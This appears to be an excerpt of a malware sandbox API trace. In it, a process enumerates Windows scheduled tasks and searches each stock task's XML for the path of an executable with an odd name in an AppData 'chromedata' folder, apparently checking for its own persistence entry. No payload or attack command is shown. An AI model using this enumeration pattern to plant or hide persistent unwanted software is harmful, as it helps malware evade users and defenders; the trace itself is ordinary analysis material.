	[0073.609] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\NetTrace\\GatherNetworkInfo</URI>\r\n    <Source>$(@%SystemRoot%\\system32\\nettrace.dll,-6910)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\nettrace.dll,-6911)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\nettrace.dll,-6912)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers />\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\gatherNetworkInfo.vbs</Command>\r\n      <WorkingDirectory>$(Arg1)</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.609] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.609] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.609] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec8) returned 0x0
	[0073.609] ITaskFolderCollection:get_Count (in: This=0x55fec8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.609] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.609] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.609] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x13, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.609] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe88) returned 0x0
	[0073.610] IRegisteredTaskCollection:get_Count (in: This=0x55fe88, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0073.610] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.610] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe88) returned 0x0
	[0073.610] ITaskFolderCollection:get_Count (in: This=0x55fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.610] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.610] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.610] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x14, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.610] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed8) returned 0x0
	[0073.610] IRegisteredTaskCollection:get_Count (in: This=0x55fed8, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.610] IRegisteredTaskCollection:get_Item (in: This=0x55fed8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.610] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="Background Synchronization") returned 0x0
	[0073.610] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Background Synchronization</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT360M</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT60M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.612] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Background Synchronization</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT360M</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT60M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.612] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.612] IRegisteredTaskCollection:get_Item (in: This=0x55fed8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.613] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="Logon Synchronization") returned 0x0
	[0073.613] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Logon Synchronization</URI>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT4M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n      <Data><![CDATA[Logon]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.614] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Offline Files\\Logon Synchronization</URI>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\cscui.dll,-5000)</Source>\r\n    <Author>$(@%systemroot%\\system32\\cscui.dll,-5001)</Author>\r\n    <Description>$(@%systemroot%\\system32\\cscui.dll,-5002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT4M</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>P1D</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{FA3F3DD9-4C1A-456B-A8FA-C76EF3ED83B8}</ClassId>\r\n      <Data><![CDATA[Logon]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.614] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.614] IUnknown:Release (This=0x55fed8) returned 0x0
	[0073.614] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed8) returned 0x0
	[0073.614] ITaskFolderCollection:get_Count (in: This=0x55fed8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.614] IUnknown:Release (This=0x55fed8) returned 0x0
	[0073.614] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.614] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x15, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.615] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fed0) returned 0x0
	[0073.615] IRegisteredTaskCollection:get_Count (in: This=0x55fed0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.615] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.615] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="BackgroundConfigSurveyor") returned 0x0
	[0073.615] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%systemRoot%\\System32\\perftrack.dll,-2003)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\perftrack.dll,-2002)</Description>\r\n    <URI>Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <IdleTrigger />\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-05-30T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{EA9155A3-8A39-40b4-8963-D3C761B18371}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.616] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%systemRoot%\\System32\\perftrack.dll,-2003)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\perftrack.dll,-2002)</Description>\r\n    <URI>Microsoft\\Windows\\PerfTrack\\BackgroundConfigSurveyor</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <IdleTrigger />\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-05-30T03:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{EA9155A3-8A39-40b4-8963-D3C761B18371}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.616] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.616] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.616] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fed0) returned 0x0
	[0073.616] ITaskFolderCollection:get_Count (in: This=0x55fed0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.616] IUnknown:Release (This=0x55fed0) returned 0x0
	[0073.616] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.617] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x16, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.617] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec0) returned 0x0
	[0073.617] IRegisteredTaskCollection:get_Count (in: This=0x55fec0, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0073.617] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.617] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec0) returned 0x0
	[0073.618] ITaskFolderCollection:get_Count (in: This=0x55fec0, pCount=0x128e2c | out: pCount=0x128e2c*=1) returned 0x0
	[0073.618] ITaskFolderCollection:get_Item (in: This=0x55fec0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x128e54 | out: ppFolder=0x128e54*=0x55ffa0) returned 0x0
	[0073.618] ITaskFolder:GetTasks (in: This=0x55ffa0, flags=1, ppTasks=0x128d28 | out: ppTasks=0x128d28*=0x22c1090) returned 0x0
	[0073.618] IRegisteredTaskCollection:get_Count (in: This=0x22c1090, pCount=0x128d18 | out: pCount=0x128d18*=0) returned 0x0
	[0073.618] IUnknown:Release (This=0x22c1090) returned 0x0
	[0073.618] ITaskFolder:GetFolders (in: This=0x55ffa0, flags=0, ppFolders=0x128d1c | out: ppFolders=0x128d1c*=0x22c1090) returned 0x0
	[0073.618] ITaskFolderCollection:get_Count (in: This=0x22c1090, pCount=0x128d14 | out: pCount=0x128d14*=0) returned 0x0
	[0073.618] IUnknown:Release (This=0x22c1090) returned 0x0
	[0073.618] TaskScheduler:IUnknown:Release (This=0x55ffa0) returned 0x0
	[0073.618] IUnknown:Release (This=0x55fec0) returned 0x0
	[0073.618] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.618] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x17, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.618] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fef0) returned 0x0
	[0073.619] IRegisteredTaskCollection:get_Count (in: This=0x55fef0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.619] IRegisteredTaskCollection:get_Item (in: This=0x55fef0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1060) returned 0x0
	[0073.619] IRegisteredTask:get_Name (in: This=0x22c1060, pName=0x128e3c | out: pName=0x128e3c*="AnalyzeSystem") returned 0x0
	[0073.619] IRegisteredTask:get_Xml (in: This=0x22c1060, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem</URI>\r\n    <Source>$(@%systemRoot%\\system32\\energy.dll,-101)</Source>\r\n    <Author>$(@%systemRoot%\\system32\\energy.dll,-103)</Author>\r\n    <Description>$(@%systemRoot%\\system32\\energy.dll,-102)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T06:00:00</StartBoundary>\r\n      <RandomDelay>PT8H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>14</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <Duration>PT5M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT5M</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\powercfg.exe</Command>\r\n      <Arguments>-energy -auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.619] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GR;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Power Efficiency Diagnostics\\AnalyzeSystem</URI>\r\n    <Source>$(@%systemRoot%\\system32\\energy.dll,-101)</Source>\r\n    <Author>$(@%systemRoot%\\system32\\energy.dll,-103)</Author>\r\n    <Description>$(@%systemRoot%\\system32\\energy.dll,-102)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T06:00:00</StartBoundary>\r\n      <RandomDelay>PT8H</RandomDelay>\r\n      <ScheduleByDay>\r\n        <DaysInterval>14</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <IdleSettings>\r\n      <Duration>PT5M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT5M</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\powercfg.exe</Command>\r\n      <Arguments>-energy -auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.620] IUnknown:Release (This=0x22c1060) returned 0x0
	[0073.620] IUnknown:Release (This=0x55fef0) returned 0x0
	[0073.620] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fef0) returned 0x0
	[0073.620] ITaskFolderCollection:get_Count (in: This=0x55fef0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.620] IUnknown:Release (This=0x55fef0) returned 0x0
	[0073.620] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.620] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x18, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.620] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec0) returned 0x0
	[0073.620] IRegisteredTaskCollection:get_Count (in: This=0x55fec0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
